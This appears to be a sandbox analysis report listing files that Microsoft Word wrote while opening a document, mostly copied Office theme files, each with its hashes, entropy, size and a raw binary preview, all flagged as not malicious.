                                        Preview:MSCF......3.....L.............................3..?..............j.....3.....t.4.............Insight design set.dotx.................Content.inf...QJ.N..[.........R.....L....N).J|E.B.$.B).3,...n.....JW....k.U1..M...3#.5....$^.....;vR...Z.nj...#......^*......a.{..(..o.v...!L`...T.-&jZ`.\.*0.....G.."b.m..F.X......$>%..?.D..H.l.j....$.......MrQ......q-....hx...6.D.3...j....n..U#R..3....sm?..xJr..............$G8..t.g...?.g.}......$P._...7.#..w..9DR....*lu....?..'.Ai..v.vl..`......B..N_....W./.;...c=oYW.lL'bv.......+...9.P..B=...*Y.SX=EL.5o....?H.e|.Fn.M[...d.v.....i......9..U..H....uq.Nrn..@..e...3....8.....s8}z..$........B....26...d..?.l....=.aeM.[..|n....H.;..7A.`....=.F...V.Y.l..8.........%e.x0S.....~..2..%.....U..#.r_.0V.v.6w.l.......Y.........v..o+....*sn.$^'.Il...akUU....w....~.....&8.Vwj.....Q.uQ..&..G.($.2.s.?m.B.~j.*..+G.W..qi..g..5.)){O........o.ow.(;.{...y;n...J...&.F2.@.;......[{'w..........`....czW.........?W...}..w....x..........

                                        C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):30
                                        Entropy (8bit):1.2389205950315936
                                        Encrypted:false
                                        SSDEEP:3:/Bh/X:
                                        MD5:1948E2092C1A74E051E058E6C63E5268
                                        SHA1:68BD89CE7384A83B68728E691510C2AECFF4F335
                                        SHA-256:F684973FD19AD34B3455F82C0C220C774A46612E096164BDEB7A5255A54BBD97
                                        SHA-512:31BC21E64958C6B84A6BC47F956DDE93DCAD96C897CE014895E891AC8B71491895C53A02ED9632AB9C1506579DED3CAC082AA809A7C8A2D2AE89892F4195CD7E
                                        Malicious:false
                                        Preview:.....$........................

                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\???????.LNK

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Dec 18 14:30:09 2024, mtime=Wed Dec 18 14:30:13 2024, atime=Wed Dec 18 14:30:09 2024, length=11302, window=hide
                                        Category:dropped
                                        Size (bytes):599
                                        Entropy (8bit):4.850423232363809
                                        Encrypted:false
                                        SSDEEP:12:8NmxhTISqfbTSHaY1kXI/Tz/Tsth+KtJaKtJzBmV:8N28z+PT/4L1tJBtJtm
                                        MD5:F4F37768BF39073EEAFF74552B946292
                                        SHA1:E9919E4AD7F0F0481F227A74F09B60C222F20F5C
                                        SHA-256:001558B67886E04F81F4000D6DA8C04B72B2F47389A38F06D098A9E5085E1418
                                        SHA-512:BD5D13F9D062F1AD1BD45FB910D18EFB247C070D3F98D82E59E8C4DB5D7D228B512C72E82A0329DEBD3732D6AF2FA9CAE8AE5A539F43E6D3ECB134EBCCF1DA30
                                        Malicious:false
                                        Preview:L..................F.... ...@...aQ..gg..aQ...`..aQ..&,......................f.d.2.&,...Y.{ .9C7B~1.DOC..J......Y.{.Y.{....).....................e.C..Q.y)R'Y<y.S..d.o.c.x...........$.......$...5...........^................F.......C:\Users\user\Desktop\???????.docx..C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.D.e.s.k.t.o.p.\..Q.y)R'Y<y.S..d.o.c.x.......#.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\..Q.y)R'Y<y.S..d.o.c.x.`.......X.......116938...........hT..CrF.f4... .../Tc...,......hT..CrF.f4... .../Tc...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Generic INItialization configuration [folders]
                                        Category:dropped
                                        Size (bytes):49
                                        Entropy (8bit):3.833016601078342
                                        Encrypted:false
                                        SSDEEP:3:HLRb6lm4Z8b6lv:HLRd0
                                        MD5:5225F92FC7C6204602FACAD1AFB9A0A2
                                        SHA1:1E04A8C70C9468DDB909077FF0226624CB35EDD9
                                        SHA-256:44D7281091105C2C6DFD80EB0E3291E5E0E1FC07E8F0F011AD83B37F3C0E9F9B
                                        SHA-512:14B51C5F0A4C68831243534869DDA3D839E5BF6C00AE18E4CA940D9251D65A911700B10899E8B7B9E1A80B6E85EA609DB36CAD7D5EAFF51EF261086B44950B33
                                        Malicious:false
                                        Preview:[misc]..???????.LNK=0..[folders]..???????.LNK=0..

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):562113
                                        Entropy (8bit):7.67409707491542
                                        Encrypted:false
                                        SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                        MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                        SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                        SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                        SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                        Malicious:false
                                        Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):1649585
                                        Entropy (8bit):7.875240099125746
                                        Encrypted:false
                                        SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                        MD5:35200E94CEB3BB7A8B34B4E93E039023
                                        SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                        SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                        SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                        Malicious:false
                                        Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):558035
                                        Entropy (8bit):7.696653383430889
                                        Encrypted:false
                                        SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                        MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                        SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                        SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                        SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                        Malicious:false
                                        Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457464[[fn=Dividend]].thmx (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):570901
                                        Entropy (8bit):7.674434888248144
                                        Encrypted:false
                                        SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                        MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                        SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                        SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                        SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                        Malicious:false
                                        Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):523048
                                        Entropy (8bit):7.715248170753013
                                        Encrypted:false
                                        SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                        MD5:C276F590BB846309A5E30ADC35C502AD
                                        SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                        SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                        SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                        Malicious:false
                                        Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):3078052
                                        Entropy (8bit):7.954129852655753
                                        Encrypted:false
                                        SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                        MD5:CDF98D6B111CF35576343B962EA5EEC6
                                        SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                        SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                        SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                        Malicious:false
                                        Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):777647
                                        Entropy (8bit):7.689662652914981
                                        Encrypted:false
                                        SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                        MD5:B30D2EF0FC261AECE90B62E9C5597379
                                        SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                        SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                        SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                        Malicious:false
                                        Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):924687
                                        Entropy (8bit):7.824849396154325
                                        Encrypted:false
                                        SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                        MD5:97EEC245165F2296139EF8D4D43BBB66
                                        SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                        SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                        SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                        Malicious:false
                                        Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):966946
                                        Entropy (8bit):7.8785200658952
                                        Encrypted:false
                                        SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                        MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                        SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                        SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                        SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                        Malicious:false
                                        Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):1204049
                                        Entropy (8bit):7.92476783994848
                                        Encrypted:false
                                        SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                        MD5:FD5BBC58056522847B3B75750603DF0C
                                        SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                        SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                        SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                        Malicious:false
                                        Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):486596
                                        Entropy (8bit):7.668294441507828
                                        Encrypted:false
                                        SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                        MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                        SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                        SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                        SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                        Malicious:false
                                        Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):976001
                                        Entropy (8bit):7.791956689344336
                                        Encrypted:false
                                        SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                        MD5:9E563D44C28B9632A7CF4BD046161994
                                        SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                        SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
